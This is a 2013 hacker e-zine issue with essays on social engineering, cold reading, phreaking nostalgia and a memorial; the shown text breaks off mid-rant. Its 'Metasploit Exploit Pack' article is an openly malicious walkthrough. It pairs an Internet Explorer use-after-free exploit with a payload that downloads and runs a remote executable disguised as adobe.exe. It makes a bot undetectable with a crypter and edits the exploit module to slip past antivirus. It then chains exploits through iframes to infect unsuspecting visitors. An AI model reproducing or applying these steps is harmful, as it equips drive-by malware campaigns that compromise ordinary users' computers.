South West Anarchy Team presents... _.--""--._ _.--""--._ / _ _ \ ###### ## ## ### ######## / _ _ \ _ ( (_\ /_) ) _ ## ## ## ## ## ## ## ## _ ( (_\ /_) ) _ { \._\ /\ /_./ } ## ## ## ## ## ## ## { \._\ /\ /_./ } /_"=-.}______{.-="_\ ###### ## ## ## ## ## ## /_"=-.}______{.-="_\ _ _.=("""")=._ _ ## ## ## ## ######### ## _ _.=("""")=._ _ (_'"_.-"`~~`"-._"'_) ## ## ## ## ## ## ## ## (_'"_.-"`~~`"-._"'_) {_" "_} ###### ### ### ## ## ## {_" "_} ## ## ### ###### ### ######## #### ## ## ######## ### ### ## ## ## ## ## ## ## ## ### ## ## #### #### ## ## ## ## ## ## ## #### ## ## ## ### ## ## ## ## #### ## ## ## ## ## ## ## ###### ## ## ######### ## ## ######### ## ## ## #### ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ###### ## ## ######## #### ## ## ######## \------------------------------------------------------------------------------/ ISSUE 42 - JUNE 2013 /------------------------------------------------------------------------------\ /--------------------------------------------\ | | |"Do not meddle in the affairs of dragons, | | for you are crunchy and good with ketchup" | | | |--------------------------------------------| | Unknown | \--------------------------------------------/ http://www.swateam.org http://www.swateam.org.uk firestarter@swateam.org.uk 12 years since the last release!!!!! Bloody hell how things have changed, although I'm glad to say that the site has remained online. I did lose the old .org domain but then after many, many years I finally got it back. So we now squat at .org.uk and .org domains. It's not to say that articles haven't been released during that time, although not many, and there are more articles written and not released forever remaining unfinished sat on a hard drive somewhere. But we're back, kinda. Given this is the first magazine release in over a decade and the world has changed, changed a lot and I don't want to wake up with an MP5 stuck in my face, I'm sad to say that there won't be any more of the fun, dangerous, absurd and downright entertaining articles on making explosives using nothing more than a couple of ink cartridges and several boxes of matches. Sad, I know but after all that terrorism bollocks over the years MI5 don't seem to enjoy such things being released any more. But as you should all know you can still find the old works on the site in the good ol' fashioned SWAT b00k!! So, instead of sticking bomb making articles in there I figured that I'd turn my hand to articles about survival and bushcraft. At least building traps and other assorted survival goodies won't get me locked up, well it depends how big I build them but you get the idea. Anyhow, without further ado.... +------------------------------------------------------------------------------+ | Contents | +---+--------------------------------------------------------------------------+ | # |Article title +++++++++++++++++++++++++++++++++++++++++++++ Author +++++++| +---+--------------------------------------------------------------------------+ |00:|Introduction......................................... -=The Firestarter=- | |01:|Mj - Our Friend...................................... -=The Firestarter=- | |02:|First Thoughts.............................. Brakis & -=The Firestarter=- | |03:|The Soft Touch of Social Engineering........................ Brakis | |04:|Why You Are Important ...................................... Brakis | |05:|Metasploit Exploit Pack.............................. -=The Firestarter=- | |06:|The Art of Cold Reading..................................... Brakis | |07:|You Were a Phreaker if you.................................. Brakis | |08:|Rambles and Rants - Social Herding.......................... Briar | |09:|Proactive Server Defence............................. -=The Firestarter=- | |10:|Three Shades of Green, and The Viridian Design Movement .. -=The-Doh-Boy=-| |11:|Fiction: Burnt by Burner.................................... davethefan | |12:|Cover Yourself From Prism............................ -=The Firestarter=- | |13:|Services and Daemons ................................ -=The Firestarter=- | |14:|SWAT Magazine Info........................................................| |15:|Wrap up and Disclaimer....................................................| +---+--------------------------------------------------------------------------+ +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | Mj - Our Friend by -=The Firestarter=- | +------------------------------------------------------------------------------+ It was May 3rd at 16:20 when Phreazoid got in touch with me and a few of the others, it was to share the sad news that our old comrade and long time friend Mj had passed away. I have to say the news hit me hard, Mj was a good friend that I'd known for years, back in SWAT's hey-day when we were at our peak and APT/Krash Magazine were in the scene with us (Mj, Ody, Chicane, Exegency). While it had been a while since I had spoken to Mj, he was always a familiar friend that I could catch on IRC and chat to. Over the years of meeting people in the scene chatting to them, bouncing ideas around or just having a laugh I don't think you realise just how much the bond between people and groups grow. Here I was with this news that we'd lost one of our own, chatting with people that I'd known for years albeit maybe not spoken to most of them for a very long time, we were all as shocked as each other, the small community that we were was still alive, and feeling the loss. Then the conversations turned to the good old days, of people we knew and who was in touch with who, so we could get the word out etc. Hearing that you've lost a friend that was once part of your day to day life isn't a good thing, but it does make you reflect on what you have now in your life as well as looking back at the good times you shared. Here we were, a group of people that hadn't spoken or seen much of each other for a time, now all brought together under such tragic circumstances. Mj will be missed, each and every one of us that knew him held respect for the guy, a genuine hacker, he had knowledge, he helped people, he shared things. He was person too, and a good one, while I never knew him outside of the h/p scene many of the others did and the condolences for Mj, that many have shared, are moving. I must be honest I was very moved myself by the news and it was decided that in his memory we would release commemorative issues of the old zines. So we got the old crew together and decided to restart SWAT Magazine. Mj, my friend, you will be missed dearly, your untimely and premature passing has brought home just how mortal we all are, and that we should live our lives to their fullest, as after all one day we must all pass on. Mj I hope you knew just how popular you were with us all and I am proud to say that I dedicate this, our best ever issue of SWAT Magazine to you. You will never be forgotten and you will always be in our hearts and minds. +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | First Thoughts | +------------------------------------------------------------------------------+ The last time Swat released an issue, which was in November 2001, the world was a very different place. Britain had a Labour government, you could be a terrorist and not be Muslim, you could buy a pint of beer for under £2.00, we were all excited about the turn of the millennium and the future seemed so full of promise. You could get a credit card, loan or mortgage with very little to no income. Drugs were more dangerous than legal highs, not the other way around. The phone in my pocket now packs 5 times more computing power than was in my beige desktop which ran Mandrake Linux and Windows 2000. The heady days of prepay phones and dodgy guys in sheds chipping philips digas to get unlimited calls. Blah blah fucking blah........nobody gives a fuck, the important thing is that after more years and failed attempts to get the ball rolling than we care to count we have finally got our shit together and brought back the awesome mag that was loved by so many back in the “oldsk00l” dayz. Don't worry though this won't be like Star Wars where the latest installments are a lot of shite. This zine is continuing where it left off only now we have a twelve year backlog of accumulated knowledge to share with the masses. It was always our purpose to publish any information to anyone in the spirit of freedom of the individual and support your right to not let anyone else, apart from yourself, make decisions for you. So in that spirit we bring you something we have all (including those who wrote it) waited a long time for. Boyz and Gurlz...Layd33z and G3n7lem3n We iz proud to present SW4T 42 Luv Hugz and a big ol’ fuckin :D Firestarter and Br4kis (Who in the past 12 years have started a successful online florist based in Devonshire, for that special occasion please visit www.yomamaspwettyflower.com) +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | The Soft Touch of Social Engineering By Brakis | +------------------------------------------------------------------------------+ This article is written in memory of MJ who's tragic and untimely passing is a great loss to the Hacking community. Obviously to those that knew him personally (who's number I cannot count myself amongst) his presence will be most painfully missed. In tragedy there can often be some hope; as in the case of the feuding or apathetic family who are brought out of hiding by a sudden bereavement, so is the case with this community who in memory of a beloved friend feel it is time to remind the world of what he and they did. The things we were interested in and the values that we held. It is in this spirit I would like to submit for your entertainment and nostalgia... The Soft Touch of Social Engineering By Brakis. Social Engineering or human hacking has been around since humans first evolved to communicate linguistically with each other and as such it is something that you will have done either consciously or unconsciously at some point today. Let me give you some examples of some subtle Social Engineering I have undertaken today without thinking: I threw a cat toy out of my bedroom so that the cat would chase it out, I didn't want to play with her I just wanted her out of my bedroom. The guy in Starfucks asked me how I was today, I told him I was well, I then reciprocated by asking him how he was. The two of us couldn't give a shit about how the other was. We have just become so familiar that we feel the need to take part in an arbitrary conversation which really serves no purpose. A colleague asked me what I did last night. My answer was simple and mundane, not because I was doing anything secretive or subversive but the thing I was actually doing was either so complicated and idiosyncratic or outside what we call the norms of socially acceptable conversation that it wasn't worth my time to explain the context which led to me undertaking the previous evening's venture. Consider the following: Conversation 1 -with SRSE (subtle and routine social engineering) Colleague: "What did you do last night mate?" Brakis: "Ah fuck all mate, I watched family guy and had a pretty early night. What about you?" Colleague: "I just chilled out with the Mrs" Brakis: "Cool" Conversation 2 -Without SRSE Colleague "What did you do last night mate?" Brakis "Well I got home, planned to masturbate. I couldn't find a suitable whack off video on pornhub because I have desensitized myself to porn over the last fifteen or so years and I have pretty much killed my internal fantasy mechanism and I actually find most porn pretty boring but I still compulsively watch it because I can't undo that little bit of internal programming. Due to the fact that I skipped lunch and was starving I ended up going to the take away and getting a huge kebab which I later felt guilty about so I ended up doing hand stand push ups against the wall in a tokenistic attempt to undo the damage from the kebab. I felt pretty good after ten so I figured I would reward myself with a wank so then I had the same problem which I had the first time. I then had a successful wank to a tried and tested video on pornhub which made me wonder if I have a more meaningful relationship with the woman in the video than with the woman I am actually with. I decided I was over thinking so I spent most of the rest of the evening trying to recompile my OS kernel so that the necessary non-proprietary drivers for my wireless card would work, this makes me guilty because I know that I really should be using free software for everything. I also watched 3 episodes of Babylon 5 which I had seen countless times before... also if you make a comment about hating Sci Fi then I will hate you forever. I read a bit of a book that is too big and I think might make me smarter and then went to bed. What about you mate?"..... You get the idea. In the 2nd example there is no deception, not by omission or misinformation. This has a number of disadvantages. One being the huge waste of time and productivity lost by such a conversation, never mind the discomfort of such a conversation. The advantage of the 1st being that it maintains the social fabric that we social engineers and human hackers can take advantage of when the need or motivation arises. Everyone wears a face which is on display all the time. It is a fusion of our physical presence, our sense of self image and self esteem, how we perceive ourselves in relation to others. It would be logical to surmise that this is an innate or automatic reaction. Necessary both as a defence mechanism and as utility for attraction (think about when you are the trying to attract the opposite sex). Being mindful of these subtleties and inate abilities serves two core purposes which are useful to the would be social engineer. The first of these is that it makes you more aware of your own internal dialogues and the noise that is in your head. Part of the fact is that a great deal of our innate deception extends to ourselves as well. Yes, believe it or not you lie to yourself! Again some of these are useful and some are not. This in turn serves to make you better at social engineering as you are able to be more tuned in to the little deceptions which ultimately make us better at what we do. The good social engineer must be aware of this, the subte social engineering, which makes up the fabric of most of our communication. Take for instance the following example. In 2005 myself and an associate had been contracted by a technology start up in europe to test their human infrastucture against social engineers, information gatherers and the like. It became apparent to us that the scale of what was required meant we would have to use extra help. We had a number of candidates that were sought through both informal and formal contacts. One candidate claimed to be a professional gambler who had a very effective track record in a sales company. Sure enough his references and contacts seemed to stack up, he had an interest in computers and wanted to get some experience of social engineering (as part of the process we even went on a trip with him to the casino so we could see his gambling success). In the end we didn't take him on for this particular project because there was something missing. The thing that was missing was mindfulness of the subtleties of the communication and that innate deception which continually takes place. He was a successful sales man because he had learned patterns and ways of talking to people which gained results. He was a successful gambler because he had learned techniques which improved his odds and he had convinced himself that he was a successful gambler. As is the case with most gambling the odds over the long run could be read either positively or negatively. Due to the fact that he was not aware of the organic way people communicate then he would find it more difficult to think on his feet and in the case of this contract prove to be an ineffective tester or perhaps even a liability. Patterns, techniques are highly useful and can be very effective but they have a limit to what they can do and a more intrinsic understanding is necessary. Simply to be a good social engineer it is always more effective to pay attention to the minutiae of human communication as it allows your innate abilities and awareness to increase. Thus making you naturally better. Intuition can be fed! The second core purpose is (perhaps in contrast to the first) the development of micro-techniques that make you more effective when approaching your projects and showing others how to do the same. At this point you might be asking "Hey Hey!!! Mr Brakis Dude....you just told us that we want to gain an understanding of innate communication and the subtleties of communication and avoid techniques and patterns." Yes I did. The distinction between what you are trying to gain and what our friend the gambling salesman has is that your techniques will be unique to you and rooted in the underlying nature of communication. Not some hackneyed technique from a book that may work 60% of the time but fails to take into account that people are individuals with entirely different perceptions. With this in mind I would like to invite you try and be more mindful of the small things about your communication. Try and keep a mental log of all the little ways in which you are dishonest or lie by omission. Once you have done that, figure out what the reason was. This will start you on the path to becoming a more skilled, natural and intuitive social engineer. Hack the human, hack the system. Brakis 2013 All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all aritcles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article. +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | Why You Are Important By Brakis | +------------------------------------------------------------------------------+ Why you are important. I imagine if you are reading this then you are somebody who in some shape or form attaches yourself to something that society perhaps looks down upon or is threatened by. You my friend, brother or sister are exactly what the world needs. Years ago my friends and I explored computers and phone systems to gain an understanding of what it is people didn’t want us to understand. This is particularly poignant at this moment in time as the world is being turned up on its head by revelations that privacy is a thing of the past and that pretty much everything we say or do is being watched. I don’t think personally this is that much of a surprise to anyone but I think that as our liberty dies we are too complacent in doing nothing about it. John Stewart Mill in his book 'On Liberty' talks a lot about how a healthy society needs individuals to be innovative to develop, to allow for new ideas to take hold and for people to grow and become better. Think of all the positive things we have done and developed in the last twenty years. We have the ability to communicate with people all over the world with very little effort, we have unparalleled access to information. We have new cooperative initiatives from people who genuinely want to make the world a better place. You are important because without people like you, people who strive, people who love, people who know that we as a species deserve the world we want to live in. Without people like you that change will never come. We will be dominated by those who seek to keep the majority down, to keep everyone quiet to keep good ideas out of the public eye. You might be reading this and thinking “No way man. I’m not important! I am just a.....” Well fuck that, you are important. You just don’t know how powerful you are yet. You have done and will do great things which will come from a place of genuine excitement and compassion and those that seek to keep you down either because they are scared of what you can do, or because you remind them of what they have not been brave enough to do themselves will be left behind in your dust. Ideas which make the world a better and more equal place come along like buses (there is none for a while but then they all come at once). You have to step out and be brave and graciously accept the experiences which have been given to you. You are important because you are that individual that makes society innovative which makes society better. Those brave, stupid, crazy ideas you have are what is going to save us.....and the best part is you can’t do it alone....you need the rest of us to make it work too. Much love brothers and sisters. Brakis. All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all aritcles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article. +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | Metasploit Exploit Pack... By -=The Firestarter=- | +------------------------------------------------------------------------------+ Exploit packs are bits of kit sold on the blackmarket with one intention: installing malware on unsuspecting victims using a variety of exploits - usually utilised via the web browser. They sell for thousands, well some do, some for a few hundred, and some for just a few quid (although they are mostly very expensive). Now as much as I'd love to wire a few grand over to some random Russian that I've never met in order to get the latest and most evil piece of drive-by installing software out there today, I am a bit of a cheapskate when it comes to paying for things I can do myself. Now I've several exploit packs in my possession, mostly downloaded from the far flung corners of the internet, all of them pretty much outdated and likely to fail on all but the least updated boxes that have the misfortune to be connected to the internet. The best exploit packs out there are very sophisticated in the ways that they work, that is they will use javascript to analyse the browser that has opened the landing page - which is usually linked in from an innocent page on a cracked server via an iframe. It will look at what versions of flash are installed, what versions of java, the operating system type, browser type, IP address etc. All of this information will now get stored in an SQL database and the pack will then attempt to exploit the system. The more sophisticated kits will see what versions of flash, java, etc are installed and fire off exploits that are known to work on them, this method has proven to be far more successful at exploiting machines than just firing off everything the kit has onboard. Given that exploit packs usually come with a handful of exploits, mainly targeting things such as flash, java, adobe acrobat and the browser itself and given the resources that the attack server has on board, it can be quicker to get one or two exploits in rather than trying to shove every known attack vector down the internet and onto some poor sod's machine. Thus, if the pack sees you have a crappy never been updated since 2010 version of flash player, it will fire off one of many exploits and get some shell code injected in there, your machine will then proceed to download some executable file from the server and run it. Hey presto you're now part of someone's botnet :) All very clever, you will now also be a statistic on the exploit packs web panel showing how many machines have been hit, how many exploited and where you're from (country) etc etc. But if we're wanting to save a bundle of cash and we're prepared to do without the web panel and statistics - I mean lets face it, bots in the net are more than enough of a statistic than what some exploit pack reports, then we can utilise our favorite exploit framework and the trusty old eee pc to create an adequate and updateable totally free of charge malware loading device. Yes you too can be an evil genius with nothing more than time and a computer. Ok, so how are we going to go about achieving this goal? First off we are going to need a payload, for testing purposes we'll assume that I want to load our latest version of Satanic Hoard (our testing bot we coded in vb6 using elite ninja skills), however like all great skid tools it's detected by every anti-virus under the sun, thus we will run it through one of our crypters and take the detection from 35/35 to 0/35. Yep, we are now fully undetected (FUD), so all those noobs with out of date machines running (their probably out of date) anti-virus software will have a nice false sense of security when we hijack their machines for evil purposes. The next and more important step, actually probably more important than the payload is the exploit, metasploit comes with a whole host of wonderful methods in which to take ownership of unsuspecting machines, some are more relevent to our cause than others, and the great thing about metasploit is its ability to update itself to the latest and greatest exploits out there. For this exercise I am going to make use of the awesome, and at time of writing newest Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability, CVE 2013-1347 . But you can browse exploit-db.com and find your own latest and most awesome pentesting codez, or be really elite and write your own - but that's another article for another time. Anyhow, let's get things going. First off, let's start metaspoit: ./msfconsole Now we set the exploit to be used: msf > use exploit/windows/browser/ie_cgenericelement_uaf Now we set the payload: msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/download_exec PAYLOAD => windows/download_exec Let's configure the payload: msf exploit(ie_cgenericelement_uaf) > set URL http://www.swateam.org/a.exe URL => http://www.swateam.org/a.exe Set what the dropped file name on the target is: msf exploit(ie_cgenericelement_uaf) > set EXE adobe.exe EXE => adobe.exe Now run it as a background job: msf exploit(ie_cgenericelement_uaf) > exploit -j [*] Exploit running as background job. Ok let's test it out, we browse to the target URL and what do we get... [*] Using URL: http://0.0.0.0:8080/2v8xriE8VXZsONY [*] Local IP: http://192.168.1.10:8080/2v8xriE8VXZsONY [*] Server started. msf exploit(ie_cgenericelement_uaf) > [*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY [*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY [*] 192.168.1.4 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7 [*] 192.168.1.4 ie_cgenericelement_uaf - Sending HTML... Ok, looks good on the attack side of things, but what happens with the target side of things? Well, AVG goes mental and starts crying about a virus!!! Oh no it's detected the exploits evil attempts to lay down the pwn on windoze, we can't be having that interfering with our attempts of world domination. First step, let's find out what's tripping things, let's go to the web cache and acquire the webpage that tripped the alert and save the contents to a text file. Now let's look through the code and see what could have caused the problems. To check this over what we're going to do is create a new .html file, we'll call it test1.html and we're going to paste in a block of text at a time, save it and scan it to find out what's causing the issues. let's begin at the top... We'll enter the first dozen or so lines into it: function mstime_malloc(oArg) { shellcode = oArg.shellcode; offset = oArg.offset; heapBlockSize = oArg.heapBlockSize; objId = oArg.objId; Look dodgy don't they? Paste, save and scan. Nothing found, ok let's move on and we'll add the next dozen or so lines into it. Those bits that look like: e = document.getElementById(objId); if (e == null) { eleId = "ZXBvS" acTag = "" document.body.innerHTML = document.body.innerHTML + acTag; e = document.getElementById(eleId); } try { e.values = buf; } catch (e) {} } function helloWorld() { sparkle = unescape("ABCD"); for (i=0; i < 2; i++) { sparkle += unescape("ABCD"); They come before that nasty looking block of code. Paste, save and scan. Still nothing!?!?!?! Ok we'll paste in the HUGE block of unescape code, that's gotta be bad ass and nasty. Still nothing! OMG am I doing it right? Now let's add the information just below that block of code, all those f0 = document.createElement sections, now save and scan. Bingo, evil virus detected!!! - I'd paste the code, but I remember when we released the iloveyouvirus and we had a fuckload of lamers complaining that we'd infected the txt documents with virii and were trying to infect people. Fuckin' noobs. Anyhow, now we've located the section of code thats tripped the scanner, so what we need to do is change it a little so that our exploit slips past and allows us to infect the target box. So what we now need to do is locate the exact part of the code that's making AVG throw a hissy fit. For this we create a document and paste ONE line at a time of the offending block, save and scan, slowly, line by line building up the offending block. What do we notice? We notice the line that says "collectgarbage" trips things so we test this by putting JUST that line in a file, save and scan, nothing, we try it with the rest, it sets it off. So now we'll paste the remaining block of text into the file, BUT remove the trigger line, save and scan, nothing found. So we know we have to change that line, or at the very least the parts around it. Since the collectgarbage is actually a part of javascript itself we can't just rename it along with whatever calls it, so we shall try some k-rad codez to make it appear slightly different. What shall we do? We'll try add a comment on the line above it. //test// Save and scan. Nothing found! Perfect, so now all we need to do is alter the main module in metasploit to ensure we always have a FUD attack to carry out on poor unsuspecting victims. So we go: cd /opt/metasploit-framework/modules/exploits/windows/browser/ nano ie_cgenericelement_uaf.rb Scroll down to the offending line (264) and add in the comment and save. You can do this to several of the top exploits, and get each one running in its own directory, then simply open up an iframe to them. If the browser hitting the sites doesn't carry the correct version etc then metasploit will return with a 4o4, or at least it does with the ie_cgenericelement_uaf exploit. This simple strategy will work with many many exploits, it also shows just how easy it is to rip them from metasploit for your own evil means. If you wish to add more exploits simply repeat the above steps until you have half a dozen or so exploits running away in the background on various URLs and either have them opened all via iframes on a page or if you feel really special then whack up some javascript to fire victims at the relevent exploits. The world is your oyster! +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | The Art of Cold Reading by Brakis. | +------------------------------------------------------------------------------+ Has there ever been a time when you as a natural skeptic have looked at someone and thought that they had an above average awareness of what was going on around them? Perhaps someone who appears to grasp things that you do not or perhaps has a deeper understanding of people. Perhaps you have seen a psychic and been amazed by the level of accuracy of the predictions they are able to draw out of thin air. In spite of knowing in your heart of hearts that there are no such things as psychics. This is true for soothsayers, psychics and any other jack ass who claims to be able to see into the future. There is a couple of techniques which I will discuss here that will give you some idea of how cold reading can be applied. I will also give you a skeleton outline of how these techniques can be used in any setting. Essential to the understanding of cold reading is ability to realise that people are essentially patterned creatures and although you should never make too many assumptions about anyone. When cold reading (or attempting to ascertain if someone is cold reading) then a fairly healthy dose of common sense must prevail. Let me give you a fairly standard example. If you think of a psychic medium, who is able to talk to the dead, what this person will be doing is finding a willing volunteer (it is safe to assume that people that have paid to sit in a room and listen to somebody that talks to ghosts in fact have the desire themselves to get in touch with someone who has died). The medium will then proceed to use a technique called shot gunning (this doesn’t mean cutting the audience down with a sawn off). This involves using a series of probability guesses until someone in the audience responds. M is for Medium, A plus a number refers to an audience member. The commentary in brackets is my commentary. M: I am sensing something coming through....someone.....oh it’s a female who’s name begins with an M or an S? A1: Oooh yes. M: You knew a woman who’s name begins with an M (how many fucking woman are there with a name that begins with the letter M) A1: Yes, my mother, Margaret (so now the stupid bitch has just told the medium everything he needs to know and the amount of supposedly correct guesses this guy can make will quickly get the woman's hopes up and probably empty her pockets too). There are a number of assumptions that you can make about A1 such as her mother has died....her relationship with her mother had some quirk for example they used to be close but something happened, A1 wasn’t there for the death of her mother, there was something she wanted to tell her but didn’t have the chance. It is also easy to make assumptions based on the kind of woman that A1 is (she may also be man) and many of the things that cannot be ascertained by her appearance or actions can be guessed at with a binary fifty fifty guess. Link this with the fact that the audience members are looking for answers and you have a perfect set up. Cold reading can be used in a number of different situations. To become super elite at cold reading you have to start to notice peoples little tells (like in poker) people give away so much from how they walk and how they act and the things they say in jest. Cold reading as with all aspects of social engineering can seem somewhat daunting at first. The trouble I find when getting deep into social engineering techniques is that I worry I will over think what I am doing and lose sight of what my objective is. My advice is to relax and not stress too much about figuring everything all out at once. You can start small and as long as you keep certain principals in mind then you will be able to get a better reading as you practice. You are human and the subject you are trying to cold read will be human so trust that you will get a better understanding as time goes on. To an extent it becomes second nature. It becomes innate and before you know it, you can get an accurate read on people before they have even said a word. As for the ethics of cold reading. As I have demonstrated it can be used for fraud however do not be too hard on the poor medium because some of these poor dolts actually think they can speak to the dead and no have idea what they are actually doing is cold reading. It is always important to stay cautious when dealing with anyone for the first time. So let cold reading be your ally. Brakis 2013 All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all aritcles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article. +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | You Were a Phreaker if you... By Brakis | +------------------------------------------------------------------------------+ Unfortunately it is very sad to admit brothers and sisters but our phreaking hay day has past. The days of scanning 080089xxxx to find a voice mail box or a teleconferencing service are sadly behind us. Public phone boxes have been replaced with mobile phones, outdials have been replaced by google hangout. Never mind fucking compuserve... With this in mind I would like to present you with a list of things that you may or may not have done which might remind you of the days of when you were a Phreaker or some such nonsense. You were a phreaker if you.... Had a long distance relationship with someone or something you had never even seen a picture of, got a hard on from a dial tone, tried blue boxing pissed by whistling the 2600 tone down a pay phone, ran from a phone box that a dial 100 operator was monitoring, done everything dodgy in a phone box except from have sex, take drugs or actually anything cool, be a little bit smug in the knowledge that the guy that bullied you at school could be taken down by your elite phone hacking skills, were in darkcyde, were out of darkcyde, got into a feud with darkcyde, loved darkcyde, hated darkcyde, created a beige box, know why this article refers to colored boxes, mourn the loss of phone boxes, try undertaking a bizarre experiment with a phone box in a Taipai car park after one too many (this might just be me), you installed bluebox tone generator on your DOS system, you loved BBS viewed BT vans with a strong degree of suspicion, perhaps going as far as to call them the gestapo, spent countless hours speaking to people you will never see in your real life, invented a new box colour in your dreams, feel incredibly proud that you were part of something genuinely different and unique, had a red sore on your ear from pushing the phone receiver to close, smelled like phone box, didn’t mind the smell of piss from a phone box, read this article and smirked to yourself at least once. Shamelessly to the good old days. Brakis 2013 Please feel free to get in touch and add your own. All text contained within this article is intended solely for information and entertainment purposes. Any legal action or prosecution which results from anything taken from the article is entirely the responsibility of the reader and the author takes no responsibility for any legal action, injury or death which happens as a result of the actions of the reader. This disclaimer applies to all aritcles, information and consultation provided by the author. This article remains the intellectual property of the author. It may be redistributed freely provided that the article remains intact and all credits, disclaimers and copyright notices remain attached to the article. +------------------------------------------------------------------------------+ _.--""--._ ___________ __ ________________ | / _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ | _ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ | { \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \| /_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /| _ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ | (_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 | {_" "_} http://www.swateam.org http://www.swateam.org.uk | +------------------------------------------------------------------------------+ | Rambles and Rants - Social Herding by Briar | +------------------------------------------------------------------------------+ Social herding even if you don't know the term I bet you've experienced the sensation. You are in a cinema with maybe fifteen or so other people, therefore there are plenty of other seats available but what happens when that next couple arrive-they sit in your row but not just in your row, oh no, they 